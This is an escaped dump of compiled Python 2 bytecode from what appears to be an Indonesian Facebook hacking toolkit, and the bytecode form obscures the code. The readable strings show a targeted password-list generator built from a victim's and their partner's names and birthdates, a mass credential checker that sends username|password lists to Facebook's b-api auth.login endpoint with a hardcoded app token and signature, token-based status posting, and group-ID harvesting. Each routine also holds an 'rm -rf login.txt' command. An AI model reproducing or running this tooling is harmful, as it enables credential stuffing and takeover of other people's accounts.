1t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00|\x01\x00d\x08\x00k\x02\x00r\xa3\x00d\t\x00GHt\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01n^\x00t\x0b\x00j\x0c\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00t\x10\x00d\r\x00\x83\x01\x00\x01d\x0e\x00d\x0f\x00\x14GHd\x10\x00|\x03\x00d\x11\x00\x19\x17GHt\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x00\x00S(\x12\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s.\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mType status \x1b[1;91m:\x1b[1;97m R\n\x00\x00\x00s\x19\x00\x00\x00\x1b[1;91m[!] 
Don\'t be emptys\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s7\x00\x00\x00https://graph.facebook.com/me/feed?method=POST&message=s\x0e\x00\x00\x00&access_token=s%\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mCreate \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97mRj\x00\x00\x00(\x11\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00(\x04\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00msgt\x03\x00\x00\x00resR\x9e\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RA\x01\x00\x00\xe1\x08\x00\x00s,\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\n\x02\x1b\x01\x12\x01\n\x01\t\x01\r\x01\n\x01c\x00\x00\x00\x00\x14\x00\x00\x00\xd0\x00\x00\x00C\x00\x00\x00s4\x05\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\xa4\x04t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHt\t\x00d\n\x00\x83\x01\x00}\x01\x00t\x02\x00|\x01\x00d\x0b\x00\x17d\x0c\x00\x83\x02\x00}\x02\x00t\t\x00d\r\x00\x83\x01\x00}\x03\x00t\t\x00d\x0e\x00\x83\x01\x00}\x04\x00t\t\x00d\x0f\x00\x83\x01\x00}\x05\x00t\t\x00d\x10\x00\x83\x01\x00}\x06\x00|\x06\x00d\x11\x00d\x12\x00!}\x07\x00|\x06\x00d\x12\x00d\x13\x00!}\x08\x00|\x06\x00d\x13\x00\x1f}\t\x00d\x08\x00d\t\x00\x14GHd\x14\x00GHt\t\x00d\x15\x00\x83\x01\x00}\n\x00t\t\x00d\x16\x00\x83\x01\x00}\x0b\x00t\t\x00d\x17\x00\x83\x01\x00}\x0c\x00t\n\x00d\x18\x00\x83\x01\x00\x01|\x0c\x00d\x11\x00d\x12\x00!}\r
\x00|\x0c\x00d\x12\x00d\x13\x00!}\x0e\x00|\x0c\x00d\x13\x00\x1f}\x0f\x00|\x02\x00j\x0b\x00d\x19\x00|\x01\x00|\x04\x00|\x01\x00|\x03\x00|\x03\x00|\x01\x00|\x03\x00|\x04\x00|\x04\x00|\x01\x00|\x04\x00|\x03\x00|\x01\x00|\x01\x00|\x03\x00|\x03\x00|\x04\x00|\x04\x00|\x01\x00|\x05\x00|\x03\x00|\x05\x00|\x04\x00|\x05\x00|\x05\x00|\x05\x00|\x05\x00|\x01\x00|\x05\x00|\x03\x00|\x05\x00|\x04\x00|\x01\x00|\x06\x00|\x01\x00|\x07\x00|\x01\x00|\x08\x00|\x01\x00|\t\x00|\x03\x00|\x06\x00|\x03\x00|\x07\x00|\x03\x00|\x08\x00|\x03\x00|\t\x00|\x04\x00|\x06\x00|\x04\x00|\x07\x00|\x04\x00|\x08\x00|\x04\x00|\t\x00|\x05\x00|\x06\x00|\x05\x00|\x07\x00|\x05\x00|\x08\x00|\x05\x00|\t\x00|\x06\x00|\x01\x00|\x07\x00|\x01\x00|\x08\x00|\x01\x00|\t\x00|\x01\x00|\x06\x00|\x03\x00|\x07\x00|\x03\x00|\x08\x00|\x03\x00|\t\x00|\x03\x00|\x06\x00|\x04\x00|\x07\x00|\x04\x00|\x08\x00|\x04\x00|\t\x00|\x04\x00|\x06\x00|\x05\x00|\x07\x00|\x05\x00|\x08\x00|\x05\x00|\t\x00|\x05\x00|\x05\x00|\x05\x00|\x01\x00|\x07\x00|\x08\x00|\x01\x00|\x08\x00|\t\x00|\x07\x00|\x08\x00|\x07\x00|\t\x00|\x07\x00|\x07\x00|\x08\x00|\x07\x00|\x08\x00|\t\x00|\x08\x00|\x08\x00|\t\x00|\x07\x00|\t\x00|\x08\x00|\t\x00|\t\x00|\t\x00|\x08\x00|\x07\x00|\x01\x00|\x08\x00|\t\x00|\x03\x00|\x07\x00|\x08\x00|\x03\x00|\x08\x00|\t\x00|\x04\x00|\x07\x00|\x08\x00|\x04\x00|\x08\x00|\t\x00|\x05\x00|\x07\x00|\x08\x00|\x05\x00|\x08\x00|\t\x00|\x01\x00|\n\x00|\x01\x00|\x0b\x00|\x01\x00|\x0c\x00|\n\x00|\x06\x00|\n\x00|\x0b\x00|\n\x00|\x0c\x00|\x03\x00|\n\x00|\x03\x00|\x0b\x00|\x03\x00|\x0c\x00|\x04\x00|\n\x00|\x04\x00|\x0b\x00|\x04\x00|\x0c\x00|\x06\x00|\x0c\x00|\x0b\x00|\x01\x00|\x0b\x00|\x03\x00|\x0b\x00|\x04\x00|\x0b\x00|\x05\x00|\x0b\x00|\x0b\x00|\x0c\x00|\x01\x00|\x0c\x00|\x03\x00|\x0c\x00|\x04\x00|\x0c\x00|\x05\x00|\x0c\x00|\x0c\x00|\n\x00|\r\x00|\n\x00|\x0e\x00|\n\x00|\x0f\x00|\x0b\x00|\r\x00|\x0b\x00|\x0e\x00|\x0b\x00|\x0f\x00|\x0b\x00|\x0c\x00f\xce\x00\x16\x83\x01\x00\x01d\x11\x00}\x10\x00x5\x00|\x10\x00d\x1a\x00k\x00\x00r\x0e\x04|\x10\x00d\x06\x00\x
17}\x10\x00|\x02\x00j\x0b\x00|\x01\x00t\x0c\x00|\x10\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\xda\x03Wd\x11\x00}\x11\x00x5\x00|\x11\x00d\x1a\x00k\x00\x00rL\x04|\x11\x00d\x06\x00\x17}\x11\x00|\x02\x00j\x0b\x00|\n\x00t\x0c\x00|\x11\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x18\x04Wd\x11\x00}\x12\x00x5\x00|\x12\x00d\x1a\x00k\x00\x00r\x8a\x04|\x12\x00d\x06\x00\x17}\x12\x00|\x02\x00j\x0b\x00|\x05\x00t\x0c\x00|\x12\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01qV\x04Wd\x11\x00}\x13\x00x5\x00|\x13\x00d\x1a\x00k\x00\x00r\xc8\x04|\x13\x00d\x06\x00\x17}\x13\x00|\x02\x00j\x0b\x00|\x0b\x00t\x0c\x00|\x13\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x94\x04W|\x02\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHd\x1d\x00|\x01\x00\x16GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01Wn)\x00\x04t\x04\x00k\n\x00r/\x05\x01}\x06\x00\x01d\x1f\x00GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S( \x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s?\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mFill in the complete data of the target belowi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: s\x04\x00\x00\x00.txtR\x11\x00\x00\x00s\'\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: s)\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: s>\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: i\x00\x00\x00\x00i\x02\x00\x00\x00i\x04\x00\x00\x00s)\x00\x00\x00\x1b[1;91m[?] 
\x1b[1;93mKalo Jomblo SKIP aja :vs&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: sD\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: s%\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mCreate \x1b[1;97m...s\xfc\x01\x00\x00%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%sid\x00\x00\x00s\x01\x00\x00\x00\ng\x00\x00\x00\x00\x00\x00\xf8?s/\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97m %s.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x11\x00\x00\x00\x1b[1;91m[!] 
Failed(\x0f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00Rg\x00\x00\x00R@\x01\x00\x00(\x14\x00\x00\x00R4\x00\x00\x00Rm\x00\x00\x00R\xcc\x00\x00\x00R\xe1\x00\x00\x00R\xe2\x00\x00\x00R\x12\x00\x00\x00R\x1f\x00\x00\x00R0\x01\x00\x00t\x01\x00\x00\x00gt\x01\x00\x00\x00hR\x13\x00\x00\x00R\x1a\x00\x00\x00t\x01\x00\x00\x00kt\x01\x00\x00\x00lt\x01\x00\x00\x00mR\xa8\x00\x00\x00t\x02\x00\x00\x00wgt\x02\x00\x00\x00ent\x04\x00\x00\x00wordt\x03\x00\x00\x00gen(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfb\x00\x00\x00\xfb\x08\x00\x00sx\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\r\x01\x05\x01\x05\x01\t\x01\x0c\x01\x13\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\r\x01\r\x01\n\x01\t\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\r\x01\r\x01\n\x01\xff\x00\xff\x00}\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\n\x01\r\x01\t\x01\t\x01\n\x01\x0b\x01\x0f\x01\x05\x01\n\x01c\x00\x00\x00\x00\r\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s@\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHg\x00\x00}\x01\x00g\x00\x00}\x02\x00g\x00\x00}\x03\x00y%\x00t\t\x00d\n\x00\x83\x01\x00}\x04\x00t\x02\x00|\x04\x00d\x03\x00\x83\x02\x00j\n\x00\x83\x00\x00}\x05\x00Wn\'\x00\x04t\x04\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01n\x01\x00Xt\t\x00d\r\x00\x83\x01\x00}\x06\x00t\x0c\x00d\x0e\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHx\xe2\x00|\x05\x00D
]\xda\x00}\x07\x00|\x07\x00j\r\x00\x83\x00\x00j\x0e\x00t\x0f\x00|\x06\x00\x83\x01\x00\x83\x01\x00\\\x02\x00}\x08\x00}\t\x00d\x0f\x00|\x08\x00\x17d\x10\x00\x17|\t\x00\x17d\x11\x00\x17}\n\x00t\x10\x00j\x11\x00|\n\x00\x83\x01\x00}\x0b\x00t\x12\x00j\x13\x00|\x0b\x00j\x14\x00\x83\x01\x00}\x0c\x00d\x12\x00|\x0c\x00k\x06\x00r\x92\x01|\x01\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x13\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01d\x15\x00|\x0c\x00d\x16\x00\x19k\x06\x00r\xc3\x01|\x02\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x17\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01|\x03\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x18\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01Wd\x08\x00d\t\x00\x14GHd\x19\x00t\x0f\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17t\x0f\x00t\x16\x00|\x02\x00\x83\x01\x00\x83\x01\x00\x17d\x1b\x00\x17t\x0f\x00t\x16\x00|\x03\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01d\x00\x00S(\x1c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sB\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCreate in file\x1b[1;91m : \x1b[1;97musername|passwordi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile path \x1b[1;91m:\x1b[1;97m s\x19\x00\x00\x00\x1b[1;91m[!] 
File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s%\x00\x00\x00\x1b[1;97m[ \x1b[1;92mLive\x1b[1;97m ] \x1b[1;97mR\xd4\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s&\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCheck\x1b[1;97m ] \x1b[1;97ms$\x00\x00\x00\x1b[1;97m[ \x1b[1;91mDie\x1b[1;97m ] \x1b[1;97ms4\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92ms\x15\x00\x00\x00 \x1b[1;97mCheck=\x1b[1;93ms\x13\x00\x00\x00 \x1b[1;97mDie=\x1b[1;91m(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xf2\x00\x00\x00R@\x01\x00\x00R 
\x00\x00\x00R\xd8\x00\x00\x00R\xd5\x00\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x94\x00\x00\x00R\x0e\x00\x00\x00(\r\x00\x00\x00R4\x00\x00\x00t\x04\x00\x00\x00liveR7\x00\x00\x00t\x03\x00\x00\x00dieR\xcc\x00\x00\x00t\x04\x00\x00\x00listt\x07\x00\x00\x00pemisaht\x04\x00\x00\x00mekiR\xde\x00\x00\x00RC\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R\xdf\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RB\x01\x00\x008\t\x00\x00sT\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x06\x01\x06\x01\x06\x01\x03\x01\x0c\x01\x19\x01\r\x01\x05\x01\n\x01\x0b\x01\x0c\x01\n\x01\t\x01\r\x01!\x01\x16\x01\x0f\x01\x12\x01\x0c\x01\r\x01\x14\x01\x10\x01\r\x01\x14\x02\r\x01\x15\x01\t\x01=\x01\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x1a\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHy\xd4\x00t\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00xp\x00|\x02\x00d\t\x00\x19D]d\x00}\x03\x00|\x03\x00d\n\x00\x19}\x04\x00|\x03\x00d\x0b\x00\x19}\x05\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x06\x00t\x10\x00j\x11\x00|\x05\x00\x83\x01\x00\x01|\x06\x00j\x12\x00|\x05\x00d\x0e\x00\x17\x83\x01\x00\x01d\x0f\x00t\x13\x00|\x05\x00\x83\x01\x00\x17d\x10\x00\x17t\x13\x00|\x04\x00\x83\x01\x00\x17GHq\xca\x00Wd\x11\x00d\x12\x00\x14GHd\x13\x00t\x14\x00t\x10\x00\x83\x01\x00\x16GHd\x14\x00GH|\x06\x00j\x15\x00\x83\x00\x00\x01t\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01Wn\xa8\x00\x
04t\x18\x00t\x19\x00f\x02\x00k\n\x00r\x9a\x01\x01\x01\x01d\x16\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n|\x00\x04t\x1a\x00k\n\x00r\xcd\x01\x01\x01\x01t\x00\x00j\x1b\x00d\x0c\x00\x83\x01\x00\x01d\x17\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01nI\x00\x04t\x0b\x00j\x1c\x00j\x1d\x00k\n\x00r\xef\x01\x01\x01\x01d\x18\x00GHt\x1e\x00\x83\x00\x00\x01n\'\x00\x04t\x04\x00k\n\x00r\x15\x02\x01\x01\x01d\x19\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1a\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00https://graph.facebook.com/me/groups?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00out/Grupid.txtR\x11\x00\x00\x00s\x01\x00\x00\x00\ns!\x00\x00\x00\x1b[1;97m[ \x1b[1;92mMyGroup\x1b[1;97m ] s\x04\x00\x00\x00 => i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal Group \x1b[1;91m:\x1b[1;97m %ss6\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97mout/Grupid.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No Connections\x10\x00\x00\x00\x1b[1;91m[!] 
Error(\x1f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00listgrupR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R,\x00\x00\x00t\x06\x00\x00\x00removeRi\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x02\x00\x00\x00uht\x03\x00\x00\x00gudR\xf1\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00R0\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RC\x01\x00\x00f\t\x00\x00s\\\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x03\x01\x13\x01\x12\x01\x11\x01\n\x01\n\x01\x0f\x01\r\x01\x11\x01!\x01\t\x01\x0f\x01\x05\x01\n\x01\n\x01\x0b\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\r\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHt\n\x00d\x0b\x00\x83\x01\x00}\x00\x00|\x00\x00d\x0c\x00k\x02\x00r\xb4\x00d\r\x00}\x01\x00t\x0b\x00t\x04\x00|\x01\x00\x83\x02\x00\x01nU\x00|\x00\x00d\x0e\x00k\x02\x00r\xd6\x00d\x0f\x00}\x02\x00t\x0b\x00t\x04\x00|\x02\x00\x83\x02\x00\x01n3\x00|\x00\x00d\x10\x00k\x02\x00r\xec\x00t\x0c\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x11\x00k\x02\x00r\x02\x01t\r\x00\x83\x00\x00\x01n\x07\x00t\r\x00\x83\x00\x00\x01d\x00\x00S(\x12\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\
x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s.\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Activates2\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Not activates*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91s\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR8\x00\x00\x00t\x04\x00\x00\x00trueR9\x00\x00\x00t\x05\x00\x00\x00falseR:\x00\x00\x00R\n\x00\x00\x00(\x0e\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xc4\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x03\x00\x00\x00RH\x01\x00\x00t\x05\x00\x00\x00aktift\x03\x00\x00\x00non(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RD\x01\x00\x00\x97\t\x00\x00s4\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x01\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s3\x00\x00\x00d\x01\x00|\x00\x00\x16}\x01\x00t\x00\x00j\x01\x00|\x01\x00\x83\x01\x00}\x02\x00t\x02\x00j\x03\x00|\x02\x00j\x04\x00\x83\x01\x00}\x03\x00|\x03\x00d\x02\x00\x19S(\x03\x00\x00\x00Ns-\x00\x00\x00https://graph.facebook.com/me?